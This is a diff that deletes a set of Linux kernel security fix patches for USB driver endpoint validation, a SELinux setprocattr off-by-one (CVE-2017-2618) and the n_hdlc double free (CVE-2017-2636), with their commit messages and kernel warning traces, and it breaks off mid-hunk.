-From 122d6a347329818419b032c5a1776e6b3866d9b9 Mon Sep 17 00:00:00 2001
-From: Cameron Gutman <aicommander@gmail.com>
-Date: Tue, 12 Sep 2017 11:27:44 -0700
-Subject: [PATCH] Input: xpad - validate USB endpoint type during probe
-
-We should only see devices with interrupt endpoints. Ignore any other
-endpoints that we find, so we don't send try to send them interrupt URBs
-and trigger a WARN down in the USB stack.
-
-Reported-by: Andrey Konovalov <andreyknvl@google.com>
-Tested-by: Andrey Konovalov <andreyknvl@google.com>
-Cc: <stable@vger.kernel.org> # c01b5e7464f0 Input: xpad - don't depend on endpoint order
-Signed-off-by: Cameron Gutman <aicommander@gmail.com>
-Signed-off-by: Dmitry Torokhov <dmitry.torokhov@gmail.com>
----
- drivers/input/joystick/xpad.c | 10 ++++++----
- 1 file changed, 6 insertions(+), 4 deletions(-)
-
-diff --git a/drivers/input/joystick/xpad.c b/drivers/input/joystick/xpad.c
-index 2578a76770404..f670dcb401c05 100644
---- a/drivers/input/joystick/xpad.c
-+++ b/drivers/input/joystick/xpad.c
-@@ -1750,10 +1750,12 @@ static int xpad_probe(struct usb_interface *intf, const struct usb_device_id *id
- 		struct usb_endpoint_descriptor *ep =
- 				&intf->cur_altsetting->endpoint[i].desc;
- 
--		if (usb_endpoint_dir_in(ep))
--			ep_irq_in = ep;
--		else
--			ep_irq_out = ep;
-+		if (usb_endpoint_xfer_int(ep)) {
-+			if (usb_endpoint_dir_in(ep))
-+				ep_irq_in = ep;
-+			else
-+				ep_irq_out = ep;
-+		}
- 	}
- 
- 	if (!ep_irq_in || !ep_irq_out) {
diff --git a/Patches/Linux_CVEs/CVE-2017-16USB/ANY/0005.patch b/Patches/Linux_CVEs/CVE-2017-16USB/ANY/0005.patch
deleted file mode 100644
index f28a1e6b..00000000
--- a/Patches/Linux_CVEs/CVE-2017-16USB/ANY/0005.patch
+++ /dev/null
@@ -1,74 +0,0 @@
-From 0a8fd1346254974c3a852338508e4a4cddbb35f1 Mon Sep 17 00:00:00 2001
-From: Alan Stern <stern@rowland.harvard.edu>
-Date: Mon, 19 Dec 2016 12:03:41 -0500
-Subject: [PATCH] USB: fix problems with duplicate endpoint addresses
-
-When checking a new device's descriptors, the USB core does not check
-for duplicate endpoint addresses.  This can cause a problem when the
-sysfs files for those endpoints are created; trying to create multiple
-files with the same name will provoke a WARNING:
-
-WARNING: CPU: 2 PID: 865 at fs/sysfs/dir.c:31 sysfs_warn_dup+0x8a/0xa0
-sysfs: cannot create duplicate filename
-'/devices/platform/dummy_hcd.0/usb2/2-1/2-1:64.0/ep_05'
-Kernel panic - not syncing: panic_on_warn set ...
-
-CPU: 2 PID: 865 Comm: kworker/2:1 Not tainted 4.9.0-rc7+ #34
-Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Bochs 01/01/2011
-Workqueue: usb_hub_wq hub_event
- ffff88006bee64c8 ffffffff81f96b8a ffffffff00000001 1ffff1000d7dcc2c
- ffffed000d7dcc24 0000000000000001 0000000041b58ab3 ffffffff8598b510
- ffffffff81f968f8 ffffffff850fee20 ffffffff85cff020 dffffc0000000000
-Call Trace:
- [<     inline     >] __dump_stack lib/dump_stack.c:15
- [<ffffffff81f96b8a>] dump_stack+0x292/0x398 lib/dump_stack.c:51
- [<ffffffff8168c88e>] panic+0x1cb/0x3a9 kernel/panic.c:179
- [<ffffffff812b80b4>] __warn+0x1c4/0x1e0 kernel/panic.c:542
- [<ffffffff812b8195>] warn_slowpath_fmt+0xc5/0x110 kernel/panic.c:565
- [<ffffffff819e70ca>] sysfs_warn_dup+0x8a/0xa0 fs/sysfs/dir.c:30
- [<ffffffff819e7308>] sysfs_create_dir_ns+0x178/0x1d0 fs/sysfs/dir.c:59
- [<     inline     >] create_dir lib/kobject.c:71
- [<ffffffff81fa1b07>] kobject_add_internal+0x227/0xa60 lib/kobject.c:229
- [<     inline     >] kobject_add_varg lib/kobject.c:366
- [<ffffffff81fa2479>] kobject_add+0x139/0x220 lib/kobject.c:411
- [<ffffffff82737a63>] device_add+0x353/0x1660 drivers/base/core.c:1088
- [<ffffffff82738d8d>] device_register+0x1d/0x20 drivers/base/core.c:1206
- [<ffffffff82cb77d3>] usb_create_ep_devs+0x163/0x260 drivers/usb/core/endpoint.c:195
- [<ffffffff82c9f27b>] create_intf_ep_devs+0x13b/0x200 drivers/usb/core/message.c:1030
- [<ffffffff82ca39d3>] usb_set_configuration+0x1083/0x18d0 drivers/usb/core/message.c:1937
- [<ffffffff82cc9e2e>] generic_probe+0x6e/0xe0 drivers/usb/core/generic.c:172
- [<ffffffff82caa7fa>] usb_probe_device+0xaa/0xe0 drivers/usb/core/driver.c:263
-
-This patch prevents the problem by checking for duplicate endpoint
-addresses during enumeration and skipping any duplicates.
-
-Signed-off-by: Alan Stern <stern@rowland.harvard.edu>
-Reported-by: Andrey Konovalov <andreyknvl@google.com>
-Tested-by: Andrey Konovalov <andreyknvl@google.com>
-CC: <stable@vger.kernel.org>
-Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
----
- drivers/usb/core/config.c | 10 ++++++++++
- 1 file changed, 10 insertions(+)
-
-diff --git a/drivers/usb/core/config.c b/drivers/usb/core/config.c
-index 0aa9e7d697a5d..25dbd8c7aec73 100644
---- a/drivers/usb/core/config.c
-+++ b/drivers/usb/core/config.c
-@@ -239,6 +239,16 @@ static int usb_parse_endpoint(struct device *ddev, int cfgno, int inum,
- 	if (ifp->desc.bNumEndpoints >= num_ep)
- 		goto skip_to_next_endpoint_or_interface_descriptor;
- 
-+	/* Check for duplicate endpoint addresses */
-+	for (i = 0; i < ifp->desc.bNumEndpoints; ++i) {
-+		if (ifp->endpoint[i].desc.bEndpointAddress ==
-+		    d->bEndpointAddress) {
-+			dev_warn(ddev, "config %d interface %d altsetting %d has a duplicate endpoint with address 0x%X, skipping\n",
-+			    cfgno, inum, asnum, d->bEndpointAddress);
-+			goto skip_to_next_endpoint_or_interface_descriptor;
-+		}
-+	}
-+
- 	endpoint = &ifp->endpoint[ifp->desc.bNumEndpoints];
- 	++ifp->desc.bNumEndpoints;
- 
diff --git a/Patches/Linux_CVEs/CVE-2017-16USB/ANY/0006.patch b/Patches/Linux_CVEs/CVE-2017-16USB/ANY/0006.patch
deleted file mode 100644
index f33cb0d2..00000000
--- a/Patches/Linux_CVEs/CVE-2017-16USB/ANY/0006.patch
+++ /dev/null
@@ -1,96 +0,0 @@
-From f9a1c372299fed53d4b72bb601f7f3bfe6f9999c Mon Sep 17 00:00:00 2001
-From: Takashi Iwai <tiwai@suse.de>
-Date: Mon, 6 Nov 2017 10:47:14 +0100
-Subject: [PATCH] ALSA: usx2y: Fix invalid stream URBs
-
-The us122l driver creates URBs per the fixed endpoints, and this may
-end up with URBs with inconsistent pipes when a fuzzer or a malicious
-program deals with the manipulated endpoints.  It ends up with a
-kernel warning like:
-
-  usb 1-1: BOGUS urb xfer, pipe 0 != type 3
-  ------------[ cut here ]------------
-  WARNING: CPU: 0 PID: 24 at drivers/usb/core/urb.c:471
-  usb_submit_urb+0x113e/0x1400
-  Call Trace:
-   usb_stream_start+0x48a/0x9f0 sound/usb/usx2y/usb_stream.c:690
-   us122l_start+0x116/0x290 sound/usb/usx2y/us122l.c:365
-   us122l_create_card sound/usb/usx2y/us122l.c:502
-   us122l_usb_probe sound/usb/usx2y/us122l.c:588
-   ....
-
-For avoiding the bad access, this patch adds a few sanity checks of
-the validity of created URBs like previous similar fixes using the new
-usb_urb_ep_type_check() helper function.
-
-Reported-by: Andrey Konovalov <andreyknvl@google.com>
-Tested-by: Andrey Konovalov <andreyknvl@google.com>
-Signed-off-by: Takashi Iwai <tiwai@suse.de>
----
- sound/usb/usx2y/usb_stream.c | 23 +++++++++++++++++------
- 1 file changed, 17 insertions(+), 6 deletions(-)
-
-diff --git a/sound/usb/usx2y/usb_stream.c b/sound/usb/usx2y/usb_stream.c
-index e229abd216526..b0f8979ff2d2f 100644
---- a/sound/usb/usx2y/usb_stream.c
-+++ b/sound/usb/usx2y/usb_stream.c
-@@ -56,7 +56,7 @@ static void playback_prep_freqn(struct usb_stream_kernel *sk, struct urb *urb)
- 		    lb, s->period_size);
- }
- 
--static void init_pipe_urbs(struct usb_stream_kernel *sk, unsigned use_packsize,
-+static int init_pipe_urbs(struct usb_stream_kernel *sk, unsigned use_packsize,
- 			   struct urb **urbs, char *transfer,
- 			   struct usb_device *dev, int pipe)
- {
-@@ -77,6 +77,8 @@ static void init_pipe_urbs(struct usb_stream_kernel *sk, unsigned use_packsize,
- 		urb->interval = 1;
- 		if (usb_pipeout(pipe))
- 			continue;
-+		if (usb_urb_ep_type_check(urb))
-+			return -EINVAL;
- 
- 		urb->transfer_buffer_length = transfer_length;
- 		desc = urb->iso_frame_desc;
-@@ -87,9 +89,11 @@ static void init_pipe_urbs(struct usb_stream_kernel *sk, unsigned use_packsize,
- 			desc[p].length = maxpacket;
- 		}
- 	}
-+
-+	return 0;
- }
- 
--static void init_urbs(struct usb_stream_kernel *sk, unsigned use_packsize,
-+static int init_urbs(struct usb_stream_kernel *sk, unsigned use_packsize,
- 		      struct usb_device *dev, int in_pipe, int out_pipe)
- {
- 	struct usb_stream	*s = sk->s;
-@@ -103,9 +107,12 @@ static void init_urbs(struct usb_stream_kernel *sk, unsigned use_packsize,
- 		sk->outurb[u] = usb_alloc_urb(sk->n_o_ps, GFP_KERNEL);
- 	}
- 
--	init_pipe_urbs(sk, use_packsize, sk->inurb, indata, dev, in_pipe);
--	init_pipe_urbs(sk, use_packsize, sk->outurb, sk->write_page, dev,
--		       out_pipe);
-+	if (init_pipe_urbs(sk, use_packsize, sk->inurb, indata, dev, in_pipe) ||
-+	    init_pipe_urbs(sk, use_packsize, sk->outurb, sk->write_page, dev,
-+			   out_pipe))
-+		return -EINVAL;
-+
-+	return 0;
- }
- 
- 
-@@ -226,7 +233,11 @@ struct usb_stream *usb_stream_new(struct usb_stream_kernel *sk,
- 	else
- 		sk->freqn = get_usb_high_speed_rate(sample_rate);
- 
--	init_urbs(sk, use_packsize, dev, in_pipe, out_pipe);
-+	if (init_urbs(sk, use_packsize, dev, in_pipe, out_pipe) < 0) {
-+		usb_stream_free(sk);
-+		return NULL;
-+	}
-+
- 	sk->s->state = usb_stream_stopped;
- out:
- 	return sk->s;
diff --git a/Patches/Linux_CVEs/CVE-2017-16USB/ANY/0007.patch.disabled b/Patches/Linux_CVEs/CVE-2017-16USB/ANY/0007.patch.disabled
deleted file mode 100644
index 917a1c73..00000000
--- a/Patches/Linux_CVEs/CVE-2017-16USB/ANY/0007.patch.disabled
+++ /dev/null
@@ -1,51 +0,0 @@
-From 58fc7f73a85d45a47057dad2af53502fdf6cf778 Mon Sep 17 00:00:00 2001
-From: Takashi Iwai <tiwai@suse.de>
-Date: Wed, 4 Oct 2017 15:07:21 +0200
-Subject: [PATCH] ALSA: caiaq: Add a sanity check for invalid EPs
-
-As syzkaller spotted, currently caiaq driver submits a URB with the
-fixed EP without checking whether it's actually available, which may
-result in a kernel warning like:
-  usb 1-1: BOGUS urb xfer, pipe 3 != type 1
-  ------------[ cut here ]------------
-  WARNING: CPU: 1 PID: 1150 at drivers/usb/core/urb.c:449
-  usb_submit_urb+0xf8a/0x11d0
-  Modules linked in:
-  CPU: 1 PID: 1150 Comm: kworker/1:1 Not tainted
-  4.14.0-rc2-42660-g24b7bd59eec0 #277
-  Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Bochs 01/01/2011
-  Workqueue: usb_hub_wq hub_event
-  Call Trace:
-   init_card sound/usb/caiaq/device.c:467
-   snd_probe+0x81c/0x1150 sound/usb/caiaq/device.c:525
-   usb_probe_interface+0x35d/0x8e0 drivers/usb/core/driver.c:361
-   ....
-
-This patch adds a sanity check of validity of EPs at the device
-initialization phase for avoiding the call with an invalid EP.
-
-Reported-by: Andrey Konovalov <andreyknvl@google.com>
-Tested-by: Andrey Konovalov <andreyknvl@google.com>
-Signed-off-by: Takashi Iwai <tiwai@suse.de>
----
- sound/usb/caiaq/device.c | 7 +++++++
- 1 file changed, 7 insertions(+)
-
-diff --git a/sound/usb/caiaq/device.c b/sound/usb/caiaq/device.c
-index 0fb6b1b792617..a29674bf96e57 100644
---- a/sound/usb/caiaq/device.c
-+++ b/sound/usb/caiaq/device.c
-@@ -461,6 +461,13 @@ static int init_card(struct snd_usb_caiaqdev *cdev)
- 			  cdev->midi_out_buf, EP1_BUFSIZE,
- 			  snd_usb_caiaq_midi_output_done, cdev);
- 
-+	/* sanity checks of EPs before actually submitting */
-+	if (usb_urb_ep_type_check(&cdev->ep1_in_urb) ||
-+	    usb_urb_ep_type_check(&cdev->midi_out_urb)) {
-+		dev_err(dev, "invalid EPs\n");
-+		return -EINVAL;
-+	}
-+
- 	init_waitqueue_head(&cdev->ep1_wait_queue);
- 	init_waitqueue_head(&cdev->prepare_wait_queue);
- 
diff --git a/Patches/Linux_CVEs/CVE-2017-16USB/ANY/0008.patch b/Patches/Linux_CVEs/CVE-2017-16USB/ANY/0008.patch
deleted file mode 100644
index 2c457bc7..00000000
--- a/Patches/Linux_CVEs/CVE-2017-16USB/ANY/0008.patch
+++ /dev/null
@@ -1,52 +0,0 @@
-From 2a4340c57717162c6bf07a0860d05711d4de994b Mon Sep 17 00:00:00 2001
-From: Takashi Iwai <tiwai@suse.de>
-Date: Wed, 4 Oct 2017 15:09:24 +0200
-Subject: [PATCH] ALSA: line6: Add a sanity check for invalid EPs
-
-As syzkaller spotted, currently line6 drivers submit a URB with the
-fixed EP without checking whether it's actually available, which may
-result in a kernel warning like:
-  usb 1-1: BOGUS urb xfer, pipe 3 != type 1
-  ------------[ cut here ]------------
-  WARNING: CPU: 0 PID: 24 at drivers/usb/core/urb.c:449
-  usb_submit_urb+0xf8a/0x11d0
-  Modules linked in:
-  CPU: 0 PID: 24 Comm: kworker/0:1 Not tainted 4.14.0-rc2-42613-g1488251d1a98 #238
-  Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Bochs 01/01/2011
-  Workqueue: usb_hub_wq hub_event
-  Call Trace:
-   line6_start_listen+0x55f/0x9e0 sound/usb/line6/driver.c:82
-   line6_init_cap_control sound/usb/line6/driver.c:690
-   line6_probe+0x7c9/0x1310 sound/usb/line6/driver.c:764
-   podhd_probe+0x64/0x70 sound/usb/line6/podhd.c:474
-   usb_probe_interface+0x35d/0x8e0 drivers/usb/core/driver.c:361
-   ....
-
-This patch adds a sanity check of validity of EPs at the device
-initialization phase for avoiding the call with an invalid EP.
-
-Reported-by: Andrey Konovalov <andreyknvl@google.com>
-Tested-by: Andrey Konovalov <andreyknvl@google.com>
-Signed-off-by: Takashi Iwai <tiwai@suse.de>
----
- sound/usb/line6/driver.c | 7 +++++++
- 1 file changed, 7 insertions(+)
-
-diff --git a/sound/usb/line6/driver.c b/sound/usb/line6/driver.c
-index 0ff5a7d2e19fe..0da6f68761e3e 100644
---- a/sound/usb/line6/driver.c
-+++ b/sound/usb/line6/driver.c
-@@ -78,6 +78,13 @@ static int line6_start_listen(struct usb_line6 *line6)
- 			line6->buffer_listen, LINE6_BUFSIZE_LISTEN,
- 			line6_data_received, line6);
- 	}
-+
-+	/* sanity checks of EP before actually submitting */
-+	if (usb_urb_ep_type_check(line6->urb_listen)) {
-+		dev_err(line6->ifcdev, "invalid control EP\n");
-+		return -EINVAL;
-+	}
-+
- 	line6->urb_listen->actual_length = 0;
- 	err = usb_submit_urb(line6->urb_listen, GFP_ATOMIC);
- 	return err;
diff --git a/Patches/Linux_CVEs/CVE-2017-16USB/ANY/0009.patch b/Patches/Linux_CVEs/CVE-2017-16USB/ANY/0009.patch
deleted file mode 100644
index 3590c21d..00000000
--- a/Patches/Linux_CVEs/CVE-2017-16USB/ANY/0009.patch
+++ /dev/null
@@ -1,52 +0,0 @@
-From 6815a0b444572527256f0d0efd8efe3ddede6018 Mon Sep 17 00:00:00 2001
-From: Takashi Iwai <tiwai@suse.de>
-Date: Wed, 4 Oct 2017 15:03:40 +0200
-Subject: [PATCH] ALSA: bcd2000: Add a sanity check for invalid EPs
-
-As syzkaller spotted, currently bcd2000 driver submits a URB with the
-fixed EP without checking whether it's actually available, which may
-result in a kernel warning like:
-  usb 1-1: BOGUS urb xfer, pipe 1 != type 3
-  ------------[ cut here ]------------
-  WARNING: CPU: 0 PID: 1846 at drivers/usb/core/urb.c:449
-  usb_submit_urb+0xf8a/0x11d0
-  Modules linked in:
-  CPU: 0 PID: 1846 Comm: kworker/0:2 Not tainted
-  4.14.0-rc2-42613-g1488251d1a98 #238
-  Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Bochs 01/01/2011
-  Workqueue: usb_hub_wq hub_event
-  Call Trace:
-   bcd2000_init_device sound/usb/bcd2000/bcd2000.c:289
-   bcd2000_init_midi sound/usb/bcd2000/bcd2000.c:345
-   bcd2000_probe+0xe64/0x19e0 sound/usb/bcd2000/bcd2000.c:406
-   usb_probe_interface+0x35d/0x8e0 drivers/usb/core/driver.c:361
-   ....
-
-This patch adds a sanity check of validity of EPs at the device
-initialization phase for avoiding the call with an invalid EP.
-
-Reported-by: Andrey Konovalov <andreyknvl@google.com>
-Tested-by: Andrey Konovalov <andreyknvl@google.com>
-Signed-off-by: Takashi Iwai <tiwai@suse.de>
----
- sound/usb/bcd2000/bcd2000.c | 7 +++++++
- 1 file changed, 7 insertions(+)
-
-diff --git a/sound/usb/bcd2000/bcd2000.c b/sound/usb/bcd2000/bcd2000.c
-index 7371e5b060356..a6408209d7f1d 100644
---- a/sound/usb/bcd2000/bcd2000.c
-+++ b/sound/usb/bcd2000/bcd2000.c
-@@ -342,6 +342,13 @@ static int bcd2000_init_midi(struct bcd2000 *bcd2k)
- 				bcd2k->midi_out_buf, BUFSIZE,
- 				bcd2000_output_complete, bcd2k, 1);
- 
-+	/* sanity checks of EPs before actually submitting */
-+	if (usb_urb_ep_type_check(bcd2k->midi_in_urb) ||
-+	    usb_urb_ep_type_check(bcd2k->midi_out_urb)) {
-+		dev_err(&bcd2k->dev->dev, "invalid MIDI EP\n");
-+		return -EINVAL;
-+	}
-+
- 	bcd2000_init_device(bcd2k);
- 
- 	return 0;
diff --git a/Patches/Linux_CVEs/CVE-2017-2618/3.10/0001.patch b/Patches/Linux_CVEs/CVE-2017-2618/3.10/0001.patch
deleted file mode 100644
index 657ed90d..00000000
--- a/Patches/Linux_CVEs/CVE-2017-2618/3.10/0001.patch
+++ /dev/null
@@ -1,67 +0,0 @@
-From a71b4196a72f09ed223d8140de7fd47ccdaf6e2b Mon Sep 17 00:00:00 2001
-From: Stephen Smalley <sds@tycho.nsa.gov>
-Date: Tue, 31 Jan 2017 11:54:04 -0500
-Subject: selinux: fix off-by-one in setprocattr
-
-commit 0c461cb727d146c9ef2d3e86214f498b78b7d125 upstream.
-
-SELinux tries to support setting/clearing of /proc/pid/attr attributes
-from the shell by ignoring terminating newlines and treating an
-attribute value that begins with a NUL or newline as an attempt to
-clear the attribute.  However, the test for clearing attributes has
-always been wrong; it has an off-by-one error, and this could further
-lead to reading past the end of the allocated buffer since commit
-bb646cdb12e75d82258c2f2e7746d5952d3e321a ("proc_pid_attr_write():
-switch to memdup_user()").  Fix the off-by-one error.
-
-Even with this fix, setting and clearing /proc/pid/attr attributes
-from the shell is not straightforward since the interface does not
-support multiple write() calls (so shells that write the value and
-newline separately will set and then immediately clear the attribute,
-requiring use of echo -n to set the attribute), whereas trying to use
-echo -n "" to clear the attribute causes the shell to skip the
-write() call altogether since POSIX says that a zero-length write
-causes no side effects. Thus, one must use echo -n to set and echo
-without -n to clear, as in the following example:
-$ echo -n unconfined_u:object_r:user_home_t:s0 > /proc/$$/attr/fscreate
-$ cat /proc/$$/attr/fscreate
-unconfined_u:object_r:user_home_t:s0
-$ echo "" > /proc/$$/attr/fscreate
-$ cat /proc/$$/attr/fscreate
-
-Note the use of /proc/$$ rather than /proc/self, as otherwise
-the cat command will read its own attribute value, not that of the shell.
-
-There are no users of this facility to my knowledge; possibly we
-should just get rid of it.
-
-UPDATE: Upon further investigation it appears that a local process
-with the process:setfscreate permission can cause a kernel panic as a
-result of this bug.  This patch fixes CVE-2017-2618.
-
-Signed-off-by: Stephen Smalley <sds@tycho.nsa.gov>
-[PM: added the update about CVE-2017-2618 to the commit description]
-Signed-off-by: Paul Moore <paul@paul-moore.com>
-Signed-off-by: Jiri Slaby <jslaby@suse.cz>
-Signed-off-by: James Morris <james.l.morris@oracle.com>
-Signed-off-by: Willy Tarreau <w@1wt.eu>
----
- security/selinux/hooks.c | 2 +-
- 1 file changed, 1 insertion(+), 1 deletion(-)
-
-diff --git a/security/selinux/hooks.c b/security/selinux/hooks.c
-index fdd6e4f..c08d4a1 100644
---- a/security/selinux/hooks.c
-+++ b/security/selinux/hooks.c
-@@ -5442,7 +5442,7 @@ static int selinux_setprocattr(struct task_struct *p,
- 		return error;
- 
- 	/* Obtain a SID for the context, if one was specified. */
--	if (size && str[1] && str[1] != '\n') {
-+	if (size && str[0] && str[0] != '\n') {
- 		if (str[size-1] == '\n') {
- 			str[size-1] = 0;
- 			size--;
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-2636/^4.10/0001.patch b/Patches/Linux_CVEs/CVE-2017-2636/^4.10/0001.patch
deleted file mode 100644
index 92d13d14..00000000
--- a/Patches/Linux_CVEs/CVE-2017-2636/^4.10/0001.patch
+++ /dev/null
@@ -1,313 +0,0 @@
-From 82f2341c94d270421f383641b7cd670e474db56b Mon Sep 17 00:00:00 2001
-From: Alexander Popov <alex.popov@linux.com>
-Date: Tue, 28 Feb 2017 19:54:40 +0300
-Subject: tty: n_hdlc: get rid of racy n_hdlc.tbuf
-
-Currently N_HDLC line discipline uses a self-made singly linked list for
-data buffers and has n_hdlc.tbuf pointer for buffer retransmitting after
-an error.
-
-The commit be10eb7589337e5defbe214dae038a53dd21add8
-("tty: n_hdlc add buffer flushing") introduced racy access to n_hdlc.tbuf.
-After tx error concurrent flush_tx_queue() and n_hdlc_send_frames() can put
-one data buffer to tx_free_buf_list twice. That causes double free in
-n_hdlc_release().
-
-Let's use standard kernel linked list and get rid of n_hdlc.tbuf:
-in case of tx error put current data buffer after the head of tx_buf_list.
-
-Signed-off-by: Alexander Popov <alex.popov@linux.com>
-Cc: stable <stable@vger.kernel.org>
-Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
----
- drivers/tty/n_hdlc.c | 132 +++++++++++++++++++++++++++------------------------
- 1 file changed, 69 insertions(+), 63 deletions(-)
-
-diff --git a/drivers/tty/n_hdlc.c b/drivers/tty/n_hdlc.c
-index 1bacbc3..e94aea8 100644
---- a/drivers/tty/n_hdlc.c
-+++ b/drivers/tty/n_hdlc.c
-@@ -114,7 +114,7 @@
- #define DEFAULT_TX_BUF_COUNT 3
- 
- struct n_hdlc_buf {
--	struct n_hdlc_buf *link;
-+	struct list_head  list_item;
- 	int		  count;
- 	char		  buf[1];
- };
-@@ -122,8 +122,7 @@ struct n_hdlc_buf {
- #define	N_HDLC_BUF_SIZE	(sizeof(struct n_hdlc_buf) + maxframe)
- 
- struct n_hdlc_buf_list {
--	struct n_hdlc_buf *head;
--	struct n_hdlc_buf *tail;
-+	struct list_head  list;
- 	int		  count;
- 	spinlock_t	  spinlock;
- };
-@@ -136,7 +135,6 @@ struct n_hdlc_buf_list {
-  * @backup_tty - TTY to use if tty gets closed
-  * @tbusy - reentrancy flag for tx wakeup code
-  * @woke_up - FIXME: describe this field
-- * @tbuf - currently transmitting tx buffer
-  * @tx_buf_list - list of pending transmit frame buffers
-  * @rx_buf_list - list of received frame buffers
-  * @tx_free_buf_list - list unused transmit frame buffers
-@@ -149,7 +147,6 @@ struct n_hdlc {
- 	struct tty_struct	*backup_tty;
- 	int			tbusy;
- 	int			woke_up;
--	struct n_hdlc_buf	*tbuf;
- 	struct n_hdlc_buf_list	tx_buf_list;
- 	struct n_hdlc_buf_list	rx_buf_list;
- 	struct n_hdlc_buf_list	tx_free_buf_list;
-@@ -159,6 +156,8 @@ struct n_hdlc {
- /*
-  * HDLC buffer list manipulation functions
-  */
-+static void n_hdlc_buf_return(struct n_hdlc_buf_list *buf_list,
-+						struct n_hdlc_buf *buf);
- static void n_hdlc_buf_put(struct n_hdlc_buf_list *list,
- 			   struct n_hdlc_buf *buf);
- static struct n_hdlc_buf *n_hdlc_buf_get(struct n_hdlc_buf_list *list);
-@@ -208,16 +207,9 @@ static void flush_tx_queue(struct tty_struct *tty)
- {
- 	struct n_hdlc *n_hdlc = tty2n_hdlc(tty);
- 	struct n_hdlc_buf *buf;
--	unsigned long flags;
- 
- 	while ((buf = n_hdlc_buf_get(&n_hdlc->tx_buf_list)))
- 		n_hdlc_buf_put(&n_hdlc->tx_free_buf_list, buf);
-- 	spin_lock_irqsave(&n_hdlc->tx_buf_list.spinlock, flags);
--	if (n_hdlc->tbuf) {
--		n_hdlc_buf_put(&n_hdlc->tx_free_buf_list, n_hdlc->tbuf);
--		n_hdlc->tbuf = NULL;
--	}
--	spin_unlock_irqrestore(&n_hdlc->tx_buf_list.spinlock, flags);
- }
- 
- static struct tty_ldisc_ops n_hdlc_ldisc = {
-@@ -283,7 +275,6 @@ static void n_hdlc_release(struct n_hdlc *n_hdlc)
- 		} else
- 			break;
- 	}
--	kfree(n_hdlc->tbuf);
- 	kfree(n_hdlc);
- 	
- }	/* end of n_hdlc_release() */
-@@ -402,13 +393,7 @@ static void n_hdlc_send_frames(struct n_hdlc *n_hdlc, struct tty_struct *tty)
- 	n_hdlc->woke_up = 0;
- 	spin_unlock_irqrestore(&n_hdlc->tx_buf_list.spinlock, flags);
- 
--	/* get current transmit buffer or get new transmit */
--	/* buffer from list of pending transmit buffers */
--		
--	tbuf = n_hdlc->tbuf;
--	if (!tbuf)
--		tbuf = n_hdlc_buf_get(&n_hdlc->tx_buf_list);
--		
-+	tbuf = n_hdlc_buf_get(&n_hdlc->tx_buf_list);
- 	while (tbuf) {
- 		if (debuglevel >= DEBUG_LEVEL_INFO)	
- 			printk("%s(%d)sending frame %p, count=%d\n",
-@@ -420,7 +405,7 @@ static void n_hdlc_send_frames(struct n_hdlc *n_hdlc, struct tty_struct *tty)
- 
- 		/* rollback was possible and has been done */
- 		if (actual == -ERESTARTSYS) {
--			n_hdlc->tbuf = tbuf;
-+			n_hdlc_buf_return(&n_hdlc->tx_buf_list, tbuf);
- 			break;
- 		}
- 		/* if transmit error, throw frame away by */
-@@ -435,10 +420,7 @@ static void n_hdlc_send_frames(struct n_hdlc *n_hdlc, struct tty_struct *tty)
- 					
- 			/* free current transmit buffer */
- 			n_hdlc_buf_put(&n_hdlc->tx_free_buf_list, tbuf);
--			
--			/* this tx buffer is done */
--			n_hdlc->tbuf = NULL;
--			
-+
- 			/* wait up sleeping writers */
- 			wake_up_interruptible(&tty->write_wait);
- 	
-@@ -448,10 +430,12 @@ static void n_hdlc_send_frames(struct n_hdlc *n_hdlc, struct tty_struct *tty)
- 			if (debuglevel >= DEBUG_LEVEL_INFO)	
- 				printk("%s(%d)frame %p pending\n",
- 					__FILE__,__LINE__,tbuf);
--					
--			/* buffer not accepted by driver */
--			/* set this buffer as pending buffer */
--			n_hdlc->tbuf = tbuf;
-+
-+			/*
-+			 * the buffer was not accepted by driver,
-+			 * return it back into tx queue
-+			 */
-+			n_hdlc_buf_return(&n_hdlc->tx_buf_list, tbuf);
- 			break;
- 		}
- 	}
-@@ -749,7 +733,8 @@ static int n_hdlc_tty_ioctl(struct tty_struct *tty, struct file *file,
- 	int error = 0;
- 	int count;
- 	unsigned long flags;
--	
-+	struct n_hdlc_buf *buf = NULL;
-+
- 	if (debuglevel >= DEBUG_LEVEL_INFO)	
- 		printk("%s(%d)n_hdlc_tty_ioctl() called %d\n",
- 			__FILE__,__LINE__,cmd);
-@@ -763,8 +748,10 @@ static int n_hdlc_tty_ioctl(struct tty_struct *tty, struct file *file,
- 		/* report count of read data available */
- 		/* in next available frame (if any) */
- 		spin_lock_irqsave(&n_hdlc->rx_buf_list.spinlock,flags);
--		if (n_hdlc->rx_buf_list.head)
--			count = n_hdlc->rx_buf_list.head->count;
-+		buf = list_first_entry_or_null(&n_hdlc->rx_buf_list.list,
-+						struct n_hdlc_buf, list_item);
-+		if (buf)
-+			count = buf->count;
- 		else
- 			count = 0;
- 		spin_unlock_irqrestore(&n_hdlc->rx_buf_list.spinlock,flags);
-@@ -776,8 +763,10 @@ static int n_hdlc_tty_ioctl(struct tty_struct *tty, struct file *file,
- 		count = tty_chars_in_buffer(tty);
- 		/* add size of next output frame in queue */
- 		spin_lock_irqsave(&n_hdlc->tx_buf_list.spinlock,flags);
--		if (n_hdlc->tx_buf_list.head)
--			count += n_hdlc->tx_buf_list.head->count;
-+		buf = list_first_entry_or_null(&n_hdlc->tx_buf_list.list,
-+						struct n_hdlc_buf, list_item);
-+		if (buf)
-+			count += buf->count;
- 		spin_unlock_irqrestore(&n_hdlc->tx_buf_list.spinlock,flags);
- 		error = put_user(count, (int __user *)arg);
- 		break;
-@@ -825,14 +814,14 @@ static unsigned int n_hdlc_tty_poll(struct tty_struct *tty, struct file *filp,
- 		poll_wait(filp, &tty->write_wait, wait);
- 
- 		/* set bits for operations that won't block */
--		if (n_hdlc->rx_buf_list.head)
-+		if (!list_empty(&n_hdlc->rx_buf_list.list))
- 			mask |= POLLIN | POLLRDNORM;	/* readable */
- 		if (test_bit(TTY_OTHER_CLOSED, &tty->flags))
- 			mask |= POLLHUP;
- 		if (tty_hung_up_p(filp))
- 			mask |= POLLHUP;
- 		if (!tty_is_writelocked(tty) &&
--				n_hdlc->tx_free_buf_list.head)
-+				!list_empty(&n_hdlc->tx_free_buf_list.list))
